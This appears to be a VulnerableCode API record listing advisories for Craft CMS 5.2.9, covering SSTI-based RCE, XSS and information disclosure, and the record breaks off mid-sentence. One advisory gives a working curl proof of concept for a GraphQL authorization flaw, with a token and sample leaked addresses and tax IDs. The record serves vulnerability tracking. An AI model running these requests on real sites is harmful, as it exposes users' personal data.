{"url":"http://public2.vulnerablecode.io/api/packages/780922?format=json","purl":"pkg:composer/craftcms/cms@5.2.9","type":"composer","namespace":"craftcms","name":"cms","version":"5.2.9","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"5.9.18","latest_non_vulnerable_version":"5.9.18","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49573?format=json","vulnerability_id":"VCID-1468-4fdx-kbfr","summary":"Craft CMS vulnerable to potential authenticated Remote Code Execution via Twig SSTI\nFor this to work, users must have administrator access to the Craft Control Panel, and [allowAdminChanges](https://craftcms.com/docs/5.x/reference/config/general.html#allowadminchanges) must be enabled, which is against Craft CMS' recommendations for any non-dev environment.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nAlternatively, a non-administrator account with allowAdminChanges disabled can be used, provided access to the System Messages utility is available.\n\nIt is possible to craft a malicious payload using the Twig `map` filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to an RCE.\n\nUsers should update to the patched versions (5.8.21 and 4.16.17) to mitigate the 
issue.\n\nReferences:\n\nhttps://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68454","reference_id":"","reference_type":"","scores":[{"value":"0.00499","scoring_system":"epss","scoring_elements":"0.66303","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68454"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-06T14:26:38Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe","reference_id":"","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-06T14:26:38Z/"}],"url":"https://github.com/craftcms/cms/commit/d82680f4a05f9576883bb83c3f6243d33ca73ebe"},{"reference_url":"https://nvd.nist.gov/vuln
/detail/CVE-2025-68454","reference_id":"CVE-2025-68454","reference_type":"","scores":[{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68454"},{"reference_url":"https://github.com/advisories/GHSA-742x-x762-7383","reference_id":"GHSA-742x-x762-7383","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-742x-x762-7383"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-742x-x762-7383","reference_id":"GHSA-742x-x762-7383","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-01-06T14:26:38Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-742x-x762-7383"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-
12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68454","GHSA-742x-x762-7383"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1468-4fdx-kbfr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49572?format=json","vulnerability_id":"VCID-1mb5-28xp-ckd2","summary":"Craft CMS vulnerable to potential information disclosure via unchecked asset relocation\nAuthenticated users on a Craft installation could potentially expose sensitive assets via their user profile photo via maliciously crafted requests.\n\nUsers should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.\n\n 
Resources:\n\nhttps://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9\n\nhttps://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68436","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1173","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68436"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T15:35:10Z/"}],"url":"https://github.com/craftcms/cms/commit/4bcb0db554e273b66ce3b75263a13414c2368fc9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68436","reference_id":"CVE-2025-68436","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68436"},{"reference_url":"https://github.com/advisories/GHSA-53vf-c43h-j2x9","reference_id":"GHSA-53vf-c43h-j2x9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_eleme
nts":""}],"url":"https://github.com/advisories/GHSA-53vf-c43h-j2x9"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9","reference_id":"GHSA-53vf-c43h-j2x9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T15:35:10Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-53vf-c43h-j2x9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID
-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68436","GHSA-53vf-c43h-j2x9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1mb5-28xp-ckd2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50301?format=json","vulnerability_id":"VCID-39ct-cg7w-kyb6","summary":"Craft CMS has Stored XSS in Table Field via \"HTML\" Column Type\nA stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `html` column type. 
The application fails to sanitize the input, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27126","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01772","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27126"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-24T19:33:58Z/"}],"url":"https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27126","reference_id":"CVE-2026-27126","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27126"},{"reference_url":"https://github.com/advisories/GHSA-3jh3-prx3-w6wc","reference_id":"GHSA-3jh3-prx3-w6wc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://gi
thub.com/advisories/GHSA-3jh3-prx3-w6wc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc","reference_id":"GHSA-3jh3-prx3-w6wc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-24T19:33:58Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerabili
ty":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27126","GHSA-3jh3-prx3-w6wc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-39ct-cg7w-kyb6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95319?format=json","vulnerability_id":"VCID-41uv-1axm-fugb","summary":"Craft CMS's Missing Authorization in GraphQL Address Resolver Allows Cross-Scope PII Disclosure\n### Summary\n\nThe GraphQL Address element resolver (src/gql/resolvers/elements/Address.php) performs no schema scope filtering on top-level queries. A GraphQL API token scoped to a single low-privilege user group can read every address in the system, including addresses belonging to users in groups the token has no authorization to access. This exposes PII, including full names, addresses, organizations, tax IDs, etc.\n\n### Details\n\nEvery GraphQL element resolver in Craft CMS applies schema scope filtering via `GqlHelper::extractAllowedEntitiesFromSchema()` when handling top-level queries, except the Address resolver.\n\nThe only gate check for addresses is `canQueryUsers()` (`src/gql/queries/Address.php`, line 30), which is a binary check. It returns `true` if the token has access to *any* user group. 
Once past this gate, no further filtering is applied.\n\n### PoC\n\n**Tested on:** CraftCMS 5.9.17 (fresh Docker install, PHP 8.3)\n**Prerequisites:** A GraphQL API token with read access to any single user group\n\n### Environment\n\n- Two user groups: `publicUsers` (in token scope) and `internalTeam` (NOT in scope)\n- 5 internal executives with corporate addresses (internalTeam)\n- 3 public customers with personal addresses (publicUsers)\n- GQL token scoped to `publicUsers:read` only\n\n**Step 1:** Introspect the schema to discover the `addresses` query is available to this token. Issue the below curl command \n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ __type(name: \\\"Query\\\") { fields { name description } } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1641\" height=\"856\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d798b4d2-9965-40fd-8252-ba6b08d1dde9\" />\n\nThe token can see `addresses`, `entries`, `users` as top-level queries.\n\n**Step 2:** Enumerate Address fields to identify PII exposure surface.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ __type(name: \\\"AddressInterface\\\") { fields { name\ntype { name } } } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1726\" height=\"862\" alt=\"image\" src=\"https://github.com/user-attachments/assets/31a90b5d-7337-49b9-8802-355f16b7b4f3\" />\n\n> Exposed fields include: `fullName`, `firstName`, `lastName`, `addressLine1/2/3`, `locality`, `postalCode`, `countryCode`, `organization`, `organizationTaxId`, `latitude`, `longitude`.\n> \n\n**Step 3:** Establish baseline -  confirm the token’s user scope is limited. 
This proves our token only has access to the `publicUsers` group.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses { id fullName firstName lastName addressLine1 addressLine2 locality postalCode countryCode organization\norganizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1626\" height=\"492\" alt=\"image\" src=\"https://github.com/user-attachments/assets/42ec8c3d-d1ae-4eac-9202-af072f394e4a\" />\n\nOnly 5 public users returned. Scope enforcement works correctly for the User resolver — internal executives are NOT visible.\n\n**Step 4:** Query all addresses - the token returns data for ALL user groups, including those outside its authorized scope.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses { id fullName firstName lastName addressLine1 addressLine2 locality postalCode countryCode organization\n  organizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1902\" height=\"910\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ef34e11c-36a8-4582-93e3-04c3e4dad6ab\" />\n\n<img width=\"1444\" height=\"942\" alt=\"image\" src=\"https://github.com/user-attachments/assets/64d6edec-60bf-4481-8a20-7f64c81c015b\" />\n\n\n ▎ \"This token can only see 5 users, but it returns 10 addresses\" as shown in the above 2 screenshot outputs\n\n> **All 10 addresses returned.** The same token that only sees 5 public users now returns addresses for internal executives including corporate tax IDs:\n> \n> - Sarah Chen, 4200 Executive Plaza Dr, SF — Horizon Dynamics Inc. 
(TaxID: 82-4917263)\n> - James Whitfield, 89 Kensington High St, London — Whitfield Capital Partners LLP (TaxID: GB927461038)\n> - Maria Rossi, 15 Via della Conciliazione, Roma — Rossi & Bianchi Avvocati (TaxID: IT04829173651)\n> - David Nakamura, 2-11-3 Meguro, Tokyo — Nakamura Medical Technologies KK (TaxID: JP8230-4719-2835)\n> - Elena Voronova, 27 Universitätsstrasse, Zurich — Voronova Biotech AG (TaxID: CHE-384.291.057)\n\n---\n\n**Step 5:** Targeted IDOR - extract a specific internal user’s address by owner ID.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses(ownerId: [3]) { fullName addressLine1 addressLine2 locality postalCode countryCode organization\n  organizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1902\" height=\"365\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b7c6d5cf-295a-433a-a76c-2b69815968cd\" />\n\n> Directly extracts a specific internal team member’s address: “Secret Admin”, 1 Secret Government Facility, Suite 007, Langley 22101 — SecretCorp LLC (TaxID: 98-7654321). The token has zero authorization to access this user’s data.\n\n## Impact \n\n### Who is Impacted\n\nAny Craft CMS Pro site (v4.0.0+) that uses GraphQL API tokens with user group scoping and stores user addresses. This is the standard deployment pattern for headless CMS sites using frameworks such as Next.js, Nuxt.js, or Gatsby. 
An attacker with any valid GraphQL token that has access to at least one user group can extract all addresses in the system, regardless of scope restrictions.\n\n### Risk\n\n- Direct threat to installation data: Any GraphQL API token with access to any single user group can extract all addresses system-wide, including names, home addresses, organizations, and tax IDs belonging to users in restricted groups.\n\n- Targeted extraction via IDOR: The `ownerId` argument allows an attacker to extract specific users’ addresses by ID, enabling targeted reconnaissance against administrators or high-value users without any brute-force or elevated access.\n\n- Scope boundary failure: Craft CMS’s GraphQL schema scoping system is the primary security mechanism for controlling API access. Every other element resolver (Entry, User, Asset, Category, Tag) enforces this boundary. The Address resolver does not, making this a foundational gap in Craft’s native authorization model and not a site-specific configuration issue.\n\n- Affects all installations using GraphQL with user groups: Any Craft CMS Pro site that exposes a scoped GraphQL token and stores addresses is affected. This is the standard headless CMS deployment pattern, not an edge case.\n\n## AI Disclosure\n\nThis vulnerability was identified through manual source code review with AI-assisted analysis (Claude). The initial pattern deviation (Address resolver missing scope filtering while all other resolvers have it) was identified through manual comparison of resolver implementations. AI was used to assist with code navigation, PoC scripting, and report drafting. 
\n\nAll findings were verified against a local Docker instance of Craft CMS 5.9.17.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44010","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02886","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44010"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:22:09Z/"}],"url":"https://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-gj2p-p9m4-c8gw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:22:09Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-gj2p-p9m4-c8gw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-4401
0","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44010"},{"reference_url":"https://github.com/advisories/GHSA-gj2p-p9m4-c8gw","reference_id":"GHSA-gj2p-p9m4-c8gw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-gj2p-p9m4-c8gw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/118776?format=json","purl":"pkg:composer/craftcms/cms@5.9.18","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18"}],"aliases":["CVE-2026-44010","GHSA-gj2p-p9m4-c8gw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-41uv-1axm-fugb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50876?format=json","vulnerability_id":"VCID-4wkr-jx1w-77hn","summary":"CraftCMS has an RCE vulnerability via relational conditionals in the control panel\nA Remote Code Execution vulnerability exists in the Craft CMS 5 conditions system.\n\nThe `BaseElementSelectConditionRule::getElementIds()` method passes user-controlled string input\nthrough `renderObjectTemplate()` -- an unsandboxed Twig rendering function with escaping disabled.\n\nAny authenticated Control Panel user (including non-admin roles such as Author or Editor) can achieve full\nRCE by sending a crafted condition rule via standard element listing endpoints.\n\nThis vulnerability 